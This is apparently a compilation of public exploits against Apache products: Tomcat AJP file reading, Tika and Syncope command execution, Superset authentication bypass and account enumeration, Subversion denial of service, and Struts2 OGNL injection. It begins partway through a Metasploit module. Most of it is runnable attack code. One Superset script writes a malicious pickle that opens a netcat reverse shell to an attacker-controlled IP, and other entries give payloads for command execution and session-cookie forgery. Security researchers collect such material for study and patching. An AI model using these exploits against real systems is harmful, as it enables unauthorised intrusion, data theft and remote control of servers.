headers = Array.new
method = "GET"
target_file = datastore['FILENAME'].to_s
attributes = [
{"req_attribute" => ["javax.servlet.include.request_uri", "index"]},
{"req_attribute" => ["javax.servlet.include.path_info" , target_file]},
{"req_attribute" => ["javax.servlet.include.servlet_path" , "/"]}
]
data = make_forward_request_package(method, headers, attributes)
buf = send_recv_once(data)
parse_response(buf, 0)
end
end
#!/usr/bin/env python
#CNVD-2020-10487 Tomcat-Ajp lfi
#by ydhcui
import struct
# Some references:
# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
def pack_string(s):
if s is None:
return struct.pack(">h", -1)
l = len(s)
return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
def unpack(stream, fmt):
size = struct.calcsize(fmt)
buf = stream.read(size)
return struct.unpack(fmt, buf)
def unpack_string(stream):
size, = unpack(stream, ">h")
if size == -1: # null string
return None
res, = unpack(stream, "%ds" % size)
stream.read(1) # \0
return res
class NotFoundException(Exception):
pass
class AjpBodyRequest(object):
# server == web server, container == servlet
SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
MAX_REQUEST_LENGTH = 8186
def __init__(self, data_stream, data_len, data_direction=None):
self.data_stream = data_stream
self.data_len = data_len
self.data_direction = data_direction
def serialize(self):
data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
if len(data) == 0:
return struct.pack(">bbH", 0x12, 0x34, 0x00)
else:
res = struct.pack(">H", len(data))
res += data
if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
header = struct.pack(">bbH", 0x12, 0x34, len(res))
else:
header = struct.pack(">bbH", 0x41, 0x42, len(res))
return header + res
def send_and_receive(self, socket, stream):
while True:
data = self.serialize()
socket.send(data)
r = AjpResponse.receive(stream)
while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
r = AjpResponse.receive(stream)
if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
break
class AjpForwardRequest(object):
_, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28)
REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE}
# server == web server, container == servlet
SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
COMMON_HEADERS = ["SC_REQ_ACCEPT",
"SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION",
"SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2",
"SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
]
ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]
def __init__(self, data_direction=None):
self.prefix_code = 0x02
self.method = None
self.protocol = None
self.req_uri = None
self.remote_addr = None
self.remote_host = None
self.server_name = None
self.server_port = None
self.is_ssl = None
self.num_headers = None
self.request_headers = None
self.attributes = None
self.data_direction = data_direction
def pack_headers(self):
self.num_headers = len(self.request_headers)
res = ""
res = struct.pack(">h", self.num_headers)
for h_name in self.request_headers:
if h_name.startswith("SC_REQ"):
code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
res += struct.pack("BB", 0xA0, code)
else:
res += pack_string(h_name)
res += pack_string(self.request_headers[h_name])
return res
def pack_attributes(self):
res = b""
for attr in self.attributes:
a_name = attr['name']
code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
res += struct.pack("b", code)
if a_name == "req_attribute":
aa_name, a_value = attr['value']
res += pack_string(aa_name)
res += pack_string(a_value)
else:
res += pack_string(attr['value'])
res += struct.pack("B", 0xFF)
return res
def serialize(self):
res = ""
res = struct.pack("bb", self.prefix_code, self.method)
res += pack_string(self.protocol)
res += pack_string(self.req_uri)
res += pack_string(self.remote_addr)
res += pack_string(self.remote_host)
res += pack_string(self.server_name)
res += struct.pack(">h", self.server_port)
res += struct.pack("?", self.is_ssl)
res += self.pack_headers()
res += self.pack_attributes()
if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
header = struct.pack(">bbh", 0x12, 0x34, len(res))
else:
header = struct.pack(">bbh", 0x41, 0x42, len(res))
return header + res
def parse(self, raw_packet):
stream = StringIO(raw_packet)
self.magic1, self.magic2, data_len = unpack(stream, "bbH")
self.prefix_code, self.method = unpack(stream, "bb")
self.protocol = unpack_string(stream)
self.req_uri = unpack_string(stream)
self.remote_addr = unpack_string(stream)
self.remote_host = unpack_string(stream)
self.server_name = unpack_string(stream)
self.server_port = unpack(stream, ">h")
self.is_ssl = unpack(stream, "?")
self.num_headers, = unpack(stream, ">H")
self.request_headers = {}
for i in range(self.num_headers):
code, = unpack(stream, ">H")
if code > 0xA000:
h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
else:
h_name = unpack(stream, "%ds" % code)
stream.read(1) # \0
h_value = unpack_string(stream)
self.request_headers[h_name] = h_value
def send_and_receive(self, socket, stream, save_cookies=False):
res = []
i = socket.sendall(self.serialize())
if self.method == AjpForwardRequest.POST:
return res
r = AjpResponse.receive(stream)
assert r.prefix_code == AjpResponse.SEND_HEADERS
res.append(r)
if save_cookies and 'Set-Cookie' in r.response_headers:
self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']
# read body chunks and end response packets
while True:
r = AjpResponse.receive(stream)
res.append(r)
if r.prefix_code == AjpResponse.END_RESPONSE:
break
elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
continue
else:
raise NotImplementedError
break
return res
class AjpResponse(object):
_,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
COMMON_SEND_HEADERS = [
"Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
"Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
]
def parse(self, stream):
# read headers
self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")
if self.prefix_code == AjpResponse.SEND_HEADERS:
self.parse_send_headers(stream)
elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
self.parse_send_body_chunk(stream)
elif self.prefix_code == AjpResponse.END_RESPONSE:
self.parse_end_response(stream)
elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
self.parse_get_body_chunk(stream)
else:
raise NotImplementedError
def parse_send_headers(self, stream):
self.http_status_code, = unpack(stream, ">H")
self.http_status_msg = unpack_string(stream)
self.num_headers, = unpack(stream, ">H")
self.response_headers = {}
for i in range(self.num_headers):
code, = unpack(stream, ">H")
if code <= 0xA000: # custom header
h_name, = unpack(stream, "%ds" % code)
stream.read(1) # \0
h_value = unpack_string(stream)
else:
h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001]
h_value = unpack_string(stream)
self.response_headers[h_name] = h_value
def parse_send_body_chunk(self, stream):
self.data_length, = unpack(stream, ">H")
self.data = stream.read(self.data_length+1)
def parse_end_response(self, stream):
self.reuse, = unpack(stream, "b")
def parse_get_body_chunk(self, stream):
rlen, = unpack(stream, ">H")
return rlen
@staticmethod
def receive(stream):
r = AjpResponse()
r.parse(stream)
return r
import socket
def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
fr.method = method
fr.protocol = "HTTP/1.1"
fr.req_uri = req_uri
fr.remote_addr = target_host
fr.remote_host = None
fr.server_name = target_host
fr.server_port = 80
fr.request_headers = {
'SC_REQ_ACCEPT': 'text/html',
'SC_REQ_CONNECTION': 'keep-alive',
'SC_REQ_CONTENT_LENGTH': '0',
'SC_REQ_HOST': target_host,
'SC_REQ_USER_AGENT': 'Mozilla',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'en-US,en;q=0.5',
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'max-age=0'
}
fr.is_ssl = False
fr.attributes = []
return fr
class Tomcat(object):
def __init__(self, target_host, target_port):
self.target_host = target_host
self.target_port = target_port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.connect((target_host, target_port))
self.stream = self.socket.makefile("rb", bufsize=0)
def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
self.req_uri = req_uri
self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method))
print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
if user is not None and password is not None:
self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '')
for h in headers:
self.forward_request.request_headers[h] = headers[h]
for a in attributes:
self.forward_request.attributes.append(a)
responses = self.forward_request.send_and_receive(self.socket, self.stream)
if len(responses) == 0:
return None, None
snd_hdrs_res = responses[0]
data_res = responses[1:-1]
if len(data_res) == 0:
print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
return snd_hdrs_res, data_res
'''
javax.servlet.include.request_uri
javax.servlet.include.path_info
javax.servlet.include.servlet_path
'''
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("target", type=str, help="Hostname or IP to attack")
parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
args = parser.parse_args()
t = Tomcat(args.target, args.port)
_,data = t.perform_request('/asdf',attributes=[
{'name':'req_attribute','value':['javax.servlet.include.request_uri','/']},
{'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]},
{'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']},
])
print('----------------------------')
print("".join([d.data for d in data]))
######################################################################################################
#Description: This is a PoC for remote command execution in Apache Tika-server. #
#Versions Affected: Tika-server versions < 1.18 #
#Researcher: David Yesland Twitter: @Daveysec #
#Blog Link: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ # #
#NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2018-1335 #
######################################################################################################
import sys
import requests
if len(sys.argv) < 4:
print "Usage: python CVE-2018-1335.py <host> <port> <command>"
print "Example: python CVE-2018-1335.py localhost 9998 calc.exe"
else:
host = sys.argv[1]
port = sys.argv[2]
cmd = sys.argv[3]
url = host+":"+str(port)+"/meta"
headers = {"X-Tika-OCRTesseractPath": "\"cscript\"",
"X-Tika-OCRLanguage": "//E:Jscript",
"Expect": "100-continue",
"Content-type": "image/jp2",
"Connection": "close"}
jscript='''var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c {}');
'''.format(cmd)
try:
requests.put("https://"+url, headers=headers, data=jscript, verify=False)
except:
try:
requests.put("http://"+url, headers=headers, data=jscript)
except:
print "Something went wrong.\nUsage: python CVE-2018-1335.py <host> <port> <command>"
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Tika Header Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in Apache
Tika 1.15 - 1.17 on Windows. A file with the image/jp2 content-type is
used to bypass magic bytes checking. When OCR is specified in the
request, parameters can be passed to change the parameters passed
at command line to allow for arbitrary JScript to execute. A
JScript stub is passed to execute arbitrary code. This module was
verified against version 1.15 - 1.17 on Windows 2012.
While the CVE and finding show more versions vulnerable, during
testing it was determined only > 1.14 was exploitable due to
jp2 support being added.
},
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => 'win',
'Targets' =>
[
['Windows',
{'Arch' => [ARCH_X86, ARCH_X64],
'Platform' => 'win',
'CmdStagerFlavor' => ['certutil']
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 25 2018',
'Author' =>
[
'h00die', # msf module
'David Yesland', # edb submission
'Tim Allison' # discovery
],
'References' =>
[
['EDB', '46540'],
['URL', 'https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/'],
['URL', 'https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E'],
['CVE', '2018-1335']
]))
register_options(
[
Opt::RPORT(9998),
OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
])
register_advanced_options(
[
OptBool.new('ForceExploit', [true, 'Override check result', false])
])
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri),
})
if res.nil?
vprint_error('No server response, check configuration')
return CheckCode::Safe
elsif res.code != 200
vprint_error('No server response, check configuration')
return CheckCode::Safe
end
if res.body =~ /Apache Tika (\d.[\d]+)/
version = Gem::Version.new($1)
vprint_status("Apache Tika Version Detected: #{version}")
if version.between?(Gem::Version.new('1.15'), Gem::Version.new('1.17'))
return CheckCode::Vulnerable
end
end
CheckCode::Safe
end
def execute_command(cmd, opts = {})
cmd.gsub(/"/, '\"')
jscript="var oShell = WScript.CreateObject('WScript.Shell');\n"
jscript << "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"
print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(target_uri, 'meta'),
'headers' => {
"X-Tika-OCRTesseractPath" => '"cscript"',
"X-Tika-OCRLanguage" => "//E:Jscript",
"Expect" => "100-continue",
"Content-type" => "image/jp2",
"Connection" => "close"},
'data' => jscript
})
fail_with(Failure::Disconnected, 'No server response') unless res
unless (res.code == 200 && res.body.include?('tika'))
fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')
end
end
def exploit
checkcode = check
unless checkcode == CheckCode::Vulnerable || datastore['ForceExploit']
print_error("#{checkcode[1]}. Set ForceExploit to override.")
return
end
execute_cmdstager(linemax: 8000)
end
end
# Exploit Title: Apache Syncope 2.0.7 - Remote Code Execution
# Date: 2018-09-12
# Exploit Author: Che-Chun Kuo
# Vendor Homepage: https://syncope.apache.org/
# Software Link: http://archive.apache.org/dist/syncope/
# Version: 2.0.7
# Tested on: Windows
# Advisory: https://syncope.apache.org/security
# CVE: CVE-2018-1321, CVE-2018-1322
# Vulnerability 1: Remote code execution by users with report and template privileges
# Description: A user with access to the Reports and Templates functionality can use XSL Transformations (XSLT)
# to perform malicious operations, including but not limited to file read, file write, and code execution.
# Apache Syncope uses XSLT to export report data into various formats. An attacker can perform malicious
# operations by crafting a XSL template, binding the template to a report, executing, then exporting the report.
# The following XSL can be used to read the Syncope security.properties file or execute the Windows
# calc program, respectively.
READ security.properties file
-------------------------------------------
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xsl:stylesheet [<!ENTITY file SYSTEM "..\webapps\syncope\WEB-INF\classes\security.properties">]>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">&file;</xsl:template>
</xsl:stylesheet>
EXECUTE Windows calc program
-------------------------------------------
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:runtime="http://xml.apache.org/xalan/java/java.lang.Runtime"
xmlns:process="http://xml.apache.org/xalan/java/java.lang.Process">
<xsl:variable name="rtobject" select="runtime:getRuntime()"/>
<xsl:variable name="process" select="runtime:exec($rtobject,'calc')"/>
<xsl:variable name="waiting" select="process:waitFor($process)"/>
<xsl:value-of select="$process"/>
</xsl:stylesheet>
# Vulnerability 2: Information disclosure via FIQL and ORDER BY sorting
# Description: A user with entitlements to the /syncope/rest/users endpoint can recover sensitive
# security values using the fiql and orderby parameters.
# By default, Apache Syncope prevents sensitive values from being returned when querying
# the /syncope/rest/users endpoint. Fields such as securityAnswers or password will always return null.
# However the results returned can be filtered or sorted based on sensitive fields. By measuring how
# the results are returned the values of the desired fields can be successfully recovered. The fiql parameter
# can be used to recover full security answers, and the orderby parameter can be used to recover
# full security answers and partial information about password hashes.
# The fiql parameter allows filtering based on user attributes, including a user's security answer.
# By using FIQL filters (i.e. "securityAnswer==a*", "securityAnswer==b*", etc...) a user's
# securityAnswer can be recovered one letter at a time.
# The orderby parameter allows sorting based on user attributes, including a user's security
# answer and password. The following example shows how orderby sorting can be exploited.
# User Bob exists with the security answer "test". A malicious user creates a user Alice with the
# security answer "ta". The malicious actor then calls the /syncope/rest/users endpoint with orderby=securityAnswer".
# By sorting using the "securityAnswer" attribute, the result will have Alice sorted ahead of Bob,
# due to the value "ta" being before the value "test". By sequentially changing Alice's security
# question and comparing the sorted result, Bob's security answer can be recovered one letter
# at a time. A similar technique can be used to reveal partial information about user password hashes.
Orderby Example Results:
Alice's security answer, Order of results returned
ta, [Alice, Bob]
tb, [Alice, Bob]
tc, [Alice, Bob]
td, [Alice, Bob]
te, [Alice, Bob]
tf, [Bob, Alice]
tea, [Alice, Bob]
teb, [Alice, Bob]
# Exploit Title: Apache Superset 2.0.0 - Authentication Bypass
# Date: 10 May 2023
# Exploit Author: MaanVader
# Vendor Homepage: https://superset.apache.org/
# Version: Apache Superset<= 2.0.1
# Tested on: 2.0.0
# CVE: CVE-2023-27524
from flask_unsign import session
import requests
import urllib3
import argparse
import re
from time import sleep
from selenium import webdriver
from urllib.parse import urlparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
SECRET_KEYS = [
b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1
b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1
b'thisISaSECRET_1234', # deployment template
b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation
b'TEST_NON_DEV_SECRET' # docker compose
]
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)
parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')
args = parser.parse_args()
try:
u = args.url.rstrip('/') + '/login/'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'
}
resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
if resp.status_code != 200:
print(f'Error retrieving login page at {u}, status code: {resp.status_code}')
return
session_cookie = None
for c in resp.cookies:
if c.name == 'session':
session_cookie = c.value
break
if not session_cookie:
print('Error: No session cookie found')
return
print(f'Got session cookie: {session_cookie}')
try:
decoded = session.decode(session_cookie)
print(f'Decoded session cookie: {decoded}')
except:
print('Error: Not a Flask session cookie')
return
match = re.search(r'"version_string": "(.*?)"', resp.text)
if match:
version = match.group(1)
else:
version = 'Unknown'
print(f'Superset Version: {version}')
for i, k in enumerate(SECRET_KEYS):
cracked = session.verify(session_cookie, k)
if cracked:
break
if not cracked:
print('Failed to crack session cookie')
return
print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')
try:
user_id = int(args.id)
except:
user_id = args.id
forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)
print(f'Forged session cookie for user {user_id}: {forged_cookie}')
u1 = args.url.rstrip('/') + '/superset/welcome'
print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")
except Exception as e:
print(f'Unexpected error: {e}')
if __name__ == '__main__':
main()
# Exploit Title: Apache Superset 1.1.0 - Time-Based Account Enumeration
# Author: Dolev Farhi
# Date: 2021-05-13
# Vendor Homepage: https://superset.apache.org/
# Version: 1.1.0
# Tested on: Ubuntu
import sys
import requests
import time
scheme = 'http'
host = '192.168.1.1'
port = 8080
# change with your wordlist
usernames = ['guest', 'admin', 'administrator', 'idontexist', 'superset']
url = '{}://{}:{}'.format(scheme, host, port)
login_endpoint = '/login/'
session = requests.Session()
def get_csrf():
token = None
r = session.get(url + login_endpoint, verify=False)
for line in r.text.splitlines():
if 'csrf_token' in line:
try:
token = line.strip().split('"')[-2]
except:
pass
return token
csrf_token = get_csrf()
if not csrf_token:
print('Could not obtain CSRF token, the exploit will likely fail.')
sys.exit(1)
data = {
'csrf_token':csrf_token,
'username':'',
'password':'abc'
}
attempts = {}
found = False
for user in usernames:
start = time.time()
data['username'] = user
r = session.post(url + login_endpoint, data=data, verify=False, allow_redirects=True)
roundtrip = time.time() - start
attempts["%.4f" % roundtrip] = user
print('[!] Accounts existence probability is sorted from high to low')
count = 0
for key in sorted(attempts, reverse=True):
count += 1
print("%s. %s (timing: %s)" % (count, attempts[key], key))
# Exploit Title: Apache Superset < 0.23 - Remote Code Execution
# Date: 2018-05-17
# Exploit Author: David May (david.may@semanticbits.com)
# Vendor Homepage: https://superset.apache.org/
# Software Link: https://github.com/apache/incubator-superset
# Version: Any before 0.23
# Tested on: Ubuntu 18.04
# CVE-ID: CVE-2018-8021
# I originally disclosed this to the Apache Superset team back in May, and the fix had already been
# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE.
#!/usr/bin/env python
import sys
import os
from lxml import html
import requests
# Change these values to your TCP listener
myIP = '192.168.137.129'
myPort = '8888'
# Credentials must belong to user with 'can Import Dashboards on Superset' privilege
username = 'test'
password = 'test'
# Logic in case script arguments are not given
if len(sys.argv) < 3:
print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...')
print('Script Usage:')
print('./supersetrce.py <superset server ip> <superset port>')
sys.exit()
else:
# Script arguments
supersetIP = sys.argv[1]
supersetPort = sys.argv[2]
# Verify these URLs match your environment
login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/'
upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards'
# Checks to see if file that we are going to write already exists in case this is run more than once
if os.path.isfile('evil.pickle'):
os.remove('evil.pickle')
# Headers that we append to our POST requests
headers_dict = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
'DNT': '1',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
}
# Creates evil pickle file and writes the reverse shell to it
evilPickle = open('evil.pickle','w+')
evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + myIP + ' ' + myPort + ' 1>/tmp/backpipe\'\ntR.')
evilPickle.close()
# Start a session so we have persistent cookies
session = requests.session()
# Grabs the Login page to parse it for its CSRF token
login_page = session.get(login_URL)
if login_page.status_code != 200:
print('Login page not reached, verify URLs in script')
login_tree = html.fromstring(login_page.content)
csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value')
# Form data that is sent in the POST request to Login page
login_data = {
'csrf_token' : csrf_token,
'username' : username,
'password' : password,
}
# Adds the Referer header for the login page
headers_dict['Referer'] = login_URL
# Logon action
login = session.post(login_URL, headers=headers_dict, data=login_data)
# Grabs the Upload page to parse it for its CSRF token
upload_page = session.get(upload_URL)
if upload_page.status_code != 200:
print('Upload page not reached, verify credentials and URLs in script')
upload_tree = html.fromstring(upload_page.content)
csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value')
# Adds the Referer header for the Upload page
headers_dict['Referer'] = upload_URL
# Upload action
upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token':csrf_token}, files={'file':('evil.pickle',open('evil.pickle','rb'),'application/octet-stream')})
# Closes the session
session.close()
sys.exit()
source: https://www.securityfocus.com/bid/58897/info
Apache Subversion is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.
Apache Subversion versions 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 are vulnerable.
curl -X LOCK --data-binary @lock_body 'http://www.example.com/repo/foo'
source: https://www.securityfocus.com/bid/58898/info
Apache Subversion is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.
Apache Subversion versions 1.7.0 through 1.7.8 are vulnerable.
curl -X REPORT --data-binary @log_report 'http://www.example.com/repo/!svn/bc/1/'
CVE Number: CVE-2013-2251
Title: Struts2 Prefixed Parameters OGNL Injection Vulnerability
Affected Software: Apache Struts v2.0.0 - 2.3.15
Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
Issue Status: v2.3.15.1 was released which fixes this vulnerability
Issue ID by Vender: S2-016
Overview:
Struts2 is an open-source web application framework for Java.
Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which
leads to arbitrary Java method execution on the target server. This is
caused by insecure handling of prefixed special parameters (action:,
redirect: and redirectAction:) in DefaultActionMapper class of Struts2.
Details:
<About DefaultActionMapper>
Struts2's ActionMapper is a mechanism for mapping between incoming HTTP
request and action to be executed on the server. DefaultActionMapper is
a default implementation of ActionMapper. It handles four types of
prefixed parameters: action:, redirect:, redirectAction: and method:.
For example, redirect prefix is used for HTTP redirect.
Normal redirect prefix usage in JSP:
<s:form action="foo">
...
<s:submit value="Register"/>
<s:submit name="redirect:http://www.google.com/" value="Cancel"/>
</s:form>
If the cancel button is clicked, redirection is performed.
Request URI for redirection:
/foo.action?redirect:http://www.google.com/
Resopnse Header:
HTTP/1.1 302 Found
Location: http://www.google.com/
Usage of other prefixed parameters is similar to redirect.
See Struts2 document for details.
https://cwiki.apache.org/confluence/display/WW/ActionMapper
<How the Attack Works>
As stated already, there are four types of prefixed parameters.
action:, redirect:, redirectAction:, method:
All except for method: can be used for attacks. But regarding action:,
it can be used only if wildcard mapping is enabled in configuration.
On the one hand, redirect: and redirectAction: are not constrained by
configuration (thus they are convenient for attackers).
One thing that should be noted is that prefixed parameters are quite
forceful. It means that behavior of application which is not intended
to accept prefixed parameters can also be overwritten by prefixed
parameters added to HTTP request. Therefore all Struts2 applications
that use DefaultActionMapper are vulnerable to the attack.
The injection point is name of prefixed parameters.
Example of attack using redirect: is shown below.
Attack URI:
/bar.action?redirect:http://www.google.com/%25{1000-1}
Response Header:
HTTP/1.1 302 Found
Location: http://www.google.com/999
As you can see, expression (1000-1) is evaluated and the result (999)
is appeared in Location response header. As I shall explain later,
more complex attacks such as OS command execution is possible too.
In DefaultActionMapper, name of prefixed parameter is once stored as
ActionMapping object and is later executed as OGNL expression.
Rough method call flow in execution phase is as the following.
org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()
org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()
org.apache.struts2.dispatcher.Dispatcher.serviceAction()
org.apache.struts2.dispatcher.StrutsResultSupport.execute()
org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()
com.opensymphony.xwork2.util.TextParseUtil.translateVariables()
com.opensymphony.xwork2.util.OgnlTextParser.evaluate()
Proof of Concept:
<PoC URLs>
PoC is already disclosed on vender's web page.
https://struts.apache.org/release/2.3.x/docs/s2-016.html
Below PoC URLs are just quotes from the vender's page.
Simple Expression:
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
OS Command Execution:
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
Obviously such attacks are not specific to blank/showcase application,
but all Struts2 based applications may be subject to attacks.
<OS Command Execution and Static Method Call>
Another topic that I think worth mentioning is that PoC URLs use
ProcessBuilder class to execute OS commands. The merit of using this
class is that it does not require static method to execute OS commands,
while Runtime class does require it.
As you may know, static method call in OGNL is basically prohibited.
But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by
a simple trick:
%{#_memberAccess['allowStaticMethodAccess']=true,
@java.lang.Runtime@getRuntime().exec('your commands')}
In Struts v2.3.14.2, SecurityMemberAccess class has been changed to
prevent the trick. However there are still some techniques to call
static method in OGNL.
One technique is to use reflection to replace static method call to
instance method call. Another technique is to overwrite #_memberAccess
object itself rather than property of the object:
%{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),
@java.lang.Runtime@getRuntime().exec('your commands')}
Probably prevention against static method is just an additional layer
of defense, but I think that global objects such as #_memberAccess
should be protected from rogue update.
Timeline:
2013/06/24 Reported to Struts Security ML
2013/07/17 Vender announced v2.3.15.1
2013/08/10 Disclosure of this advisory
Recommendation:
Immediate upgrade to the latest version is strongly recommended as
active attacks have already been observed. It should be noted that
redirect: and redirectAction: parameters were completely dropped and
do not work in the latest version as stated in the vender's page.
Thus attention for compatibility issues is required for upgrade.
If you cannot upgrade your Struts2 immediately, filtering (by custom
servlet filter, IPS, WAF and so on) can be a mitigation solution for
this vulnerability. Some points about filtering solution are listed
below.
- Both %{expr} and ${expr} notation can be used for attacks.
- Parameters both in querystring and in request body can be used.
- redirect: and redirectAction: can be used not only for Java method
execution but also for open redirect.
See S2-017 (CVE-2013-2248) for open redirect issue.
